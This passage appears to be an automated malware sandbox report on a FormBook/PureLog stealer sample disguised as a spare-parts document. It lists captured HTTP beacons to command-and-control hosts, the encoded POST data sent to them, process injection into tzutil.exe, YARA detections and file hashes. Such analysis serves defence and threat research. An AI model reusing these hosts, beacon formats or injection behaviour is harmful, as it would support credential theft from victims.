Nov 25, 2024 10:51:13.632747889 CET | 698 | IN | Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49913 | 107.155.56.30 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 10:51:30.313256979 CET | 797 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
Nov 25, 2024 10:51:31.856654882 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49921 | 107.155.56.30 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 10:51:32.976150036 CET | 821 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 219
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb2id4rQiEB9e5rAGVArg99WmwW1Q==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.9 | 49927 | 107.155.56.30 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:35.753143072 CET | 1834 | OUT | POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1231
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR= [TRUNCATED]
                                                            Nov 25, 2024 10:51:37.297677994 CET | 697 | IN | HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.9 | 49933 | 107.155.56.30 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:38.406712055 CET | 534 | OUT | GET /2gcl/?BzI0pR=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&Ap=KZH8jfU0 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 25, 2024 10:51:39.964409113 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Nov 25, 2024 10:51:39.964445114 CET | 1236 | IN
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Nov 25, 2024 10:51:39.964458942 CET | 1236 | IN
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Nov 25, 2024 10:51:39.964494944 CET | 1236 | IN
                                                            Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                            Nov 25, 2024 10:51:39.964505911 CET | 1236 | IN
                                                            Data Ascii: .toString(16).substring(1); } function guid() { return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4()); } if(!sessionStorage.sessionId) { sessionStorage.sessionId = guid(); }</script><script>if(localSt
                                                            Nov 25, 2024 10:51:39.964517117 CET | 1236 | IN
                                                            Data Ascii: } if(localStorage.source === sourceData.tikTokSource) { ! function(w, d, t) { w.TiktokAnalyticsObject = t; var ttq = w[t] = w[t] || []; ttq.methods = ["page", "track", "identify", "instances", "debug", "on
                                                            Nov 25, 2024 10:51:39.964524031 CET | 1236 | IN
                                                            Data Ascii: t.getElementsByTagName("script")[0]; a.parentNode.insertBefore(o, a) }; ttq.load(fb_id || 'C5T758KFMUHRC7DGN9U0'); ttq.track('PageView'); }(window, document, 'ttq'); } else { ttq = { tr
                                                            Nov 25, 2024 10:51:39.964673042 CET | 1236 | IN
                                                            Data Ascii: =function(p){y([p])};y(c)}catch(e){}};var scr=d.getElementsByTagName(t)[0],par=scr.parentNode;par.insertBefore(s,scr)})(window,document,"script","https://s.yimg.com/wi/ytc.js","dotq"); }</script><title></title><script>window.onload = funct
                                                            Nov 25, 2024 10:51:39.964687109 CET | 14 | IN
                                                            Data Ascii: </body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.9 | 49953 | 13.228.81.39 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:46.353514910 CET | 824 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEWA+rD5BgtCIV5mquSm3ZcgZPw/
                                                            Nov 25, 2024 10:51:47.935400009 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 09:51:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.9 | 49959 | 13.228.81.39 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:49.021966934 CET | 848 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 219
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHeo5X31NmxEc7DsBcrDMnS4sCyg==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.9 | 49966 | 13.228.81.39 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:51.677752018 CET | 1861 | OUT | POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1231
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: BzI0pR= [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.9 | 49972 | 13.228.81.39 | 80 | 6784 | C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 25, 2024 10:51:54.332039118 CET | 543 | OUT | GET /y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 25, 2024 10:51:55.961998940 CET | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 09:51:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>



                                                            Target ID:0
                                                            Start time:04:49:57
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0xa30000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1389196693.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:04:50:01
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0x3c0000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:04:50:01
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0x530000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:04:50:50
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe"
                                                            Imagebase:0x440000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:04:50:52
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0xfe0000
                                                            File size:48'640 bytes
                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:04:51:05
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe"
                                                            Imagebase:0x440000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:04:51:17
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff73feb0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:11.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:3.2%
                                                              Total number of Nodes:312
                                                              Total number of Limit Nodes:22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1797dd8bcaba8a32eab9170080102687e9e6432ebdc9cb5c92d936fce8675cc3
                                                              • Instruction ID: b8eaa9c19860de7ca5effdab09fd499717d4f7262b8026ca5725710f885805e8
                                                              • Opcode Fuzzy Hash: 1797dd8bcaba8a32eab9170080102687e9e6432ebdc9cb5c92d936fce8675cc3
                                                              • Instruction Fuzzy Hash: 7232DCB1B11215AFDB19DBA5C560BAEB7F6EF88300F204469E5069B3A0CB30DD02CB61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c9682990493ee3870eff9a2cffa9e4a1bd054d6c0ddd9cd6247d2255f5e9902
                                                              • Instruction ID: 343417ae5d42ab370f2fac355a71cd2ee0af78dae4a6c0918de22dc40bc25fcd
                                                              • Opcode Fuzzy Hash: 1c9682990493ee3870eff9a2cffa9e4a1bd054d6c0ddd9cd6247d2255f5e9902
                                                              • Instruction Fuzzy Hash: 189159B5E24228DFDB24CF65C8447E9B7B6BF8A300F14D0AAC40CA7251DB749A86DF40

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722C056
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 20fa2d9effad606687560469b621f6a7aef90c8a84b612e4a385d156542d6ce0
                                                              • Instruction ID: cc538685f7310e40e6b512813f40464f61168ee0a88b7eaa3e5d5745d96c3595
                                                              • Opcode Fuzzy Hash: 20fa2d9effad606687560469b621f6a7aef90c8a84b612e4a385d156542d6ce0
                                                              • Instruction Fuzzy Hash: 6AA15CB1D1036ADFEB24CF68C8417EDBBB6BF48310F148169E818A7240DB759986DF91

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722C056
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: f42d72d89072fd8288cc619dbea6f98ff873bba909e0400d51e7b8e54f83600f
                                                              • Instruction ID: 45f79469d54ec89675d5ec1064edef4d5bd0d1202f0643abfbc623160c9de58d
                                                              • Opcode Fuzzy Hash: f42d72d89072fd8288cc619dbea6f98ff873bba909e0400d51e7b8e54f83600f
                                                              • Instruction Fuzzy Hash: 49914BB1D1036ADFEB24CF68C8417EDBBB6BF48310F148169E818A7240DB759986DF91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBAFDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02DB59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02DB59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722BC28
                                                              Memory Dump Source
